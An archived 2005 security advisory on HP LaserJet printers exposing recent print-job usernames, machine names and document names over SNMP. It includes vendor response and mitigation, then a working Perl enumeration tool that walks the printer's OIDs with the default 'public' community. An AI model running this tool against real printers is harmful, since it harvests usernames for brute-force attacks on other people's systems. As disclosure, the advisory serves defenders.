Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PTL_advisory_050825.txt

🗓️ 22 Sep 2005 00:00:00Reported by George HedforsType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 39 Views

HP LaserJet printers expose sensitive document info via SNMP, risking user credential enumeration.

Code
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
=================================================================  
  
P . T . L .  
  
P I N I O N S T E K N I S K A L A B O R A T O R I U M  
  
(The Pinion Technical Laboratory)  
  
http://www.pinion.se  
  
  
Advisory  
  
=================================================================  
  
  
Vulnerability Name  
- - ------------------  
HP LaserJet Network Username and Information Enumeration  
  
  
Pinion ID  
- - ---------  
PTL_advisory_050825  
  
  
Author  
- - ------  
George Hedfors  
  
  
Class  
- - -----  
Configuration Error  
  
  
Remote  
- - ------  
Yes  
  
  
Local  
- - -----  
N/A  
  
  
Discovered  
- - ----------  
August 25 2005  
  
  
Published  
- - ---------  
September 15 2005  
  
  
Updated  
- - -------  
N/A  
  
  
Credit  
- - ------  
This vulnerability was found by George Hedfors.  
  
  
Vulnerable  
- - ----------  
HP LaserJet 2430  
  
Possibly other HP printers that operate using the Jetdirect  
controls.  
  
  
Discussion  
- - ----------  
HP LaserJet printers has an extensive administrative user interface  
provided over SNMP. SNMP is normally used for monitoring applications  
and servers performance but can also be used to perform remote  
configurations.  
  
Pinion has discovered that HP LaserJet printers store information  
regarding recently printed documents. Information such as document  
name, title, number of pages, document size, user who has printed the  
document and the machine name where the print job was initiated.  
  
This document information "cache" is flushed when the document is  
older then one hour but in mean time, the information can be obtained  
by anyone with access to the network and who has information  
regarding the "public" SNMP community configured at the printer.  
  
In reality, an intruder could use this information to obtain possible  
usernames that later could be used in a login brute force attack  
against servers.  
  
Hewlet Packard was informed about this issue on September 7, 2005.  
  
Vendor response: "This information is kept by the printer in the  
printer specific MIB. Jetdirect controls the authentication and  
subsequent authorization to all the MIBs. This authentication/  
authorization can be controlled via SNMP settings."  
  
HP tracking number: SSRT051032  
  
  
Solution  
- - --------  
There is no direct way to prevent the printer from exposing  
information about recently printed documents except for disabling  
SNMP.  
  
Access to administrative features of the LaserJet, including SNMP,  
can be controlled and limited in various ways depending on the  
security requirements of the customer's environment. For more  
information please refer to "HP Jetdirect Embedded Print Server  
Administrator's Guide", chapter 7 - Security Features.  
  
  
References  
- - ----------  
"HP Jetdirect Embedded Print Server Administrator's Guide"  
  
http://h20000.www2.hp.com/bizsupport/TechSupport/DocumentIndex.jsp?  
locale=en_US&contentType=SupportManual&docIndexId=3124&  
prodTypeId=18972&prodSeriesId=416419&lang=en&cc=us  
  
Additional information regarding HP Jetdirect security is available  
here:  
  
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?  
objectID=bpj05999  
  
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?  
objectID=c00004828  
  
  
Exploit  
- - -------  
The tool attached provides a possibility to extract the described  
information.  
  
#!/usr/bin/perl  
#####################################################################  
##  
## HP LaserJet SNMP User name enumeration tool v0.2 by  
## Pinion Labs 050705  
## george[46]hedfors[64]pinion[46]se  
## http://www.pinion.se  
##  
## Description  
## HP LaserJet printers loggs recent printed documents with  
## timestamp, size, number of pages, username and machine name.  
## These can be extracted using a specially crafted SNMP Object ID.  
##  
## Document name under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.1  
## Document pages under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.12  
## Document size under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.14  
## Usernames are found under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.1  
## Machine names under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.2  
##  
## Output format  
## DocID:Username:Machine:Pages:Size:DocName  
##  
##  
  
use Net::SNMP;  
  
## Number of errors in row that is tolerated before exit  
$tolerance = 10;  
## Default SNMP community to use  
$defcommunity = "public";  
## Default SNMP port to use  
$defport = 161;  
  
### END OF CONFIG ###  
  
$host = $ARGV[0] || die "syntax: $0 victim.com \[community\] ".  
"\[startid\]\n";  
$community = $ARGV[1] || $defcommunity;  
$startid = $ARGV[2] || 0;  
  
($session, $error) = Net::SNMP->session(-hostname => $host,  
-community => $community,  
-port => $defport);  
  
if (!defined($session)) {  
printf("ERROR: %s.\n", $error);  
exit 1;  
}  
  
for($i = $startid; $err < $tolerance; $i++) {  
$oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.1.$i.0";  
$result = $session->get_request(-varbindlist => [$oid]);  
  
if (!defined($result)) {  
if($found > 0) {  
$err++;  
}  
} else {  
$found++;  
  
($null, $user) = split(/\=/, $result->{$oid}, 2);  
  
$oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.2.$i.0";  
$result = $session->get_request(-varbindlist => [$oid]);  
($null, $id) = split(/\=/, $result->{$oid}, 2);  
  
$oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.1.$i.0";  
$result = $session->get_request(-varbindlist => [$oid]);  
$doc = hex2ascii($result->{$oid});  
  
$oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.12.$i.0";  
$result = $session->get_request(-varbindlist => [$oid]);  
$pages = $result->{$oid};  
  
$oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.14.$i.0";  
$result = $session->get_request(-varbindlist => [$oid]);  
$size = $result->{$oid};  
  
printf("%d:%s:%s:%s:%s:%s\n", $i, $user, $id, $pages, $size, $doc);  
  
$err = 0;  
}  
}  
  
$session->close;  
  
exit 0;  
  
sub hex2ascii() {  
my $hex = shift;  
my $asc;  
  
for($n = 6; $n < length($hex); $n += 2) {  
$asc .= chr(hex(substr($hex, $n, 2)));  
}  
  
return $asc;  
}  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGP 8.1  
  
iQA/AwUBQykij3/1dBNpei3QEQKgnQCfULMT+VkrGLe9dJLx/3oAB8gP/B4An0Xe  
of2e6qiAGjUV6noguEpAloBm  
=h5Fv  
-----END PGP SIGNATURE-----  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Sep 2005 00:00Current
7.4High risk
Vulners AI Score7.4
hp laserjet printernetwork vulnerabilitydocument informationsnmp exposureconfiguration error.
39